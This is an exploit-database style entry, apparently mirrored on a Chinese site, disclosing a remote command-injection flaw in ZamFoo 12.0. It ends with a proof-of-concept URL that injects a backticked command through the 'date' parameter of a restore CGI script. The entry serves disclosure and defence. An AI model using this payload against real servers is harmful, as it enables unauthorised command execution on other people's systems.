ZamFoo – ‘date’ Remote Command Injection - 体验盒子

作者： localhost.re

日期： 2013-06-15

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/38598/

source: https://www.securityfocus.com/bid/60826/info

ZamFoo is prone to a remote command-injection vulnerability.

Attackers can exploit this issue to execute arbitrary commands in the context of the application.

ZamFoo 12.0 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command`